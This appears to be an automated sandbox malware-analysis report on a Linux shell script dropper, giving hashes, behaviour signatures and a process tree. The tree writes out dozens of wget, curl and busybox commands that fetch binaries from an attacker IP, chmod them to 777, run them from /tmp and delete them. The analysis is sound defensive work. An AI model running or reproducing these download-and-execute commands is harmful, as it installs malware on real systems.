Analysis
- max time kernel: 15s
- max time network: 131s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20240611-en
- resource tags: arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system
- submitted: 28/10/2024, 02:12
Static task
static1
Behavioral task
behavioral1
Sample
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
Resource
debian9-mipsel-20240611-en
General
- Target: 1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
- Size: 10KB
- MD5: d8b3cb4793886f8ba51c73bc3cadbaca
- SHA1: 2a4c460dad61345bdd09351812e2865159abe9dd
- SHA256: 1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31
- SHA512: dac5943a6be21fdaf966f6845585dedf0d97cbfa7743cd046fe3570f9ed3a292545364c7f491984555e1e5c5093f3ed46570d03629c6f6786b735a294788e013
- SSDEEP: 192:rmjDQXL2FkYrQo5MENdKVRKKmdNdKVR2kYrQoYjDQXLoN:UFkYrQo5MAKmbkYrQo6
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh/tmp/1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh1⤵PID:1490
-
/bin/rm/bin/rm bins.sh2⤵PID:1497
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:1498
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- Writes file to tmp directory
PID:1499
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:1503
-
-
/bin/chmodchmod 777 LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- File and Directory Permissions Modification
PID:1504
-
-
/tmp/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv./LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- Executes dropped EXE
PID:1505
-
-
/bin/rmrm LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:1506
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:1507
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- Writes file to tmp directory
PID:1508
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:1509
-
-
/bin/chmodchmod 777 x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- File and Directory Permissions Modification
PID:1510
-
-
/tmp/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB./x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- Executes dropped EXE
PID:1511
-
-
/bin/rmrm x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:1512
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:1513
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- Writes file to tmp directory
PID:1514
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:1515
-
-
/bin/chmodchmod 777 jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- File and Directory Permissions Modification
PID:1516
-
-
/tmp/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM./jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- Executes dropped EXE
PID:1517
-
-
/bin/rmrm jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:1518
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:1519
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:1522
-
-
/bin/chmodchmod 777 mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- File and Directory Permissions Modification
PID:1523
-
-
/tmp/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj./mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- Executes dropped EXE
PID:1524
-
-
/bin/rmrm mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:1525
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:1526
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- Writes file to tmp directory
PID:1527
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:1528
-
-
/bin/chmodchmod 777 kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- File and Directory Permissions Modification
PID:1529
-
-
/tmp/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6./kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- Executes dropped EXE
PID:1530
-
-
/bin/rmrm kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:1531
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:1532
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:1534
-
-
/bin/chmodchmod 777 ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy./ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- Executes dropped EXE
PID:1536
-
-
/bin/rmrm ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:1537
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:1538
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- Writes file to tmp directory
PID:1539
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:1540
-
-
/bin/chmodchmod 777 CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- File and Directory Permissions Modification
PID:1541
-
-
/tmp/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b./CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- Executes dropped EXE
PID:1542
-
-
/bin/rmrm CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:1543
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:1544
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:1546
-
-
/bin/chmodchmod 777 HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI./HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- Executes dropped EXE
PID:1548
-
-
/bin/rmrm HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:1549
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:1550
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:1552
-
-
/bin/chmodchmod 777 dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- File and Directory Permissions Modification
PID:1553
-
-
/tmp/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY./dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- Executes dropped EXE
PID:1554
-
-
/bin/rmrm dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:1555
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:1556
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- Writes file to tmp directory
PID:1557
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:1558
-
-
/bin/chmodchmod 777 Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9./Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- Executes dropped EXE
PID:1560
-
-
/bin/rmrm Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:1561
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:1562
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- Writes file to tmp directory
PID:1563
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:1564
-
-
/bin/chmodchmod 777 ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- File and Directory Permissions Modification
PID:1565
-
-
/tmp/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ./ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- Executes dropped EXE
PID:1566
-
-
/bin/rmrm ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:1567
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:1568
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- Writes file to tmp directory
PID:1569
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:1570
-
-
/bin/chmodchmod 777 yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0./yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- Executes dropped EXE
PID:1572
-
-
/bin/rmrm yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:1573
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:1574
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- Writes file to tmp directory
PID:1575
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:1576
-
-
/bin/chmodchmod 777 ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- File and Directory Permissions Modification
PID:1577
-
-
/tmp/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX./ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- Executes dropped EXE
PID:1578
-
-
/bin/rmrm ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:1579
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:1580
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- Writes file to tmp directory
PID:1581
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:1582
-
-
/bin/chmodchmod 777 vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- File and Directory Permissions Modification
PID:1583
-
-
/tmp/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr./vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- Executes dropped EXE
PID:1584
-
-
/bin/rmrm vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:1585
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:1586
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:1588
-
-
/bin/chmodchmod 777 kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- File and Directory Permissions Modification
PID:1589
-
-
/tmp/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6./kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- Executes dropped EXE
PID:1590
-
-
/bin/rmrm kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:1591
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:1592
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- Writes file to tmp directory
PID:1593
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:1594
-
-
/bin/chmodchmod 777 mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- File and Directory Permissions Modification
PID:1595
-
-
/tmp/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj./mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- Executes dropped EXE
PID:1596
-
-
/bin/rmrm mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:1597
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:1598
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- Writes file to tmp directory
PID:1599
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:1600
-
-
/bin/chmodchmod 777 dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- File and Directory Permissions Modification
PID:1601
-
-
/tmp/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY./dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- Executes dropped EXE
PID:1602
-
-
/bin/rmrm dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:1603
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:1604
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- Writes file to tmp directory
PID:1605
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:1606
-
-
/bin/chmodchmod 777 ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- File and Directory Permissions Modification
PID:1607
-
-
/tmp/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy./ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- Executes dropped EXE
PID:1608
-
-
/bin/rmrm ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:1609
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:1610
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- Writes file to tmp directory
PID:1611
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:1612
-
-
/bin/chmodchmod 777 CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- File and Directory Permissions Modification
PID:1613
-
-
/tmp/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b./CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- Executes dropped EXE
PID:1614
-
-
/bin/rmrm CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:1615
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:1616
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- Writes file to tmp directory
PID:1617
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:1618
-
-
/bin/chmodchmod 777 HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- File and Directory Permissions Modification
PID:1619
-
-
/tmp/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI./HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- Executes dropped EXE
PID:1620
-
-
/bin/rmrm HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:1621
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:1622
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- Writes file to tmp directory
PID:1623
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:1624
-
-
/bin/chmodchmod 777 ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- File and Directory Permissions Modification
PID:1625
-
-
/tmp/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX./ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- Executes dropped EXE
PID:1626
-
-
/bin/rmrm ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:1627
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:1628
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- Writes file to tmp directory
PID:1629
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:1630
-
-
/bin/chmodchmod 777 vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- File and Directory Permissions Modification
PID:1631
-
-
/tmp/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr./vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- Executes dropped EXE
PID:1632
-
-
/bin/rmrm vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:1633
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:1634
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- Writes file to tmp directory
PID:1635
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:1636
-
-
/bin/chmodchmod 777 Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- File and Directory Permissions Modification
PID:1637
-
-
/tmp/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9./Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:1639
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:1640
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:1642
-
-
/bin/chmodchmod 777 ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- File and Directory Permissions Modification
PID:1643
-
-
/tmp/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ./ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- Executes dropped EXE
PID:1644
-
-
/bin/rmrm ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:1645
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:1646
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- Writes file to tmp directory
PID:1647
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:1648
-
-
/bin/chmodchmod 777 yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- File and Directory Permissions Modification
PID:1649
-
-
/tmp/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0./yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- Executes dropped EXE
PID:1650
-
-
/bin/rmrm yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:1651
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:1652
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:1654
-
-
/bin/chmodchmod 777 jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- File and Directory Permissions Modification
PID:1655
-
-
/tmp/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM./jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- Executes dropped EXE
PID:1656
-
-
/bin/rmrm jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:1657
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:1658
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- Writes file to tmp directory
PID:1659
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:1660
-
-
/bin/chmodchmod 777 LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- File and Directory Permissions Modification
PID:1661
-
-
/tmp/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv./LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- Executes dropped EXE
PID:1662
-
-
/bin/rmrm LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:1663
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:1664
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- Writes file to tmp directory
PID:1665
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:1666
-
-
/bin/chmodchmod 777 x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- File and Directory Permissions Modification
PID:1667
-
-
/tmp/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB./x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- Executes dropped EXE
PID:1668
-
-
/bin/rmrm x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:1669
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize 153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97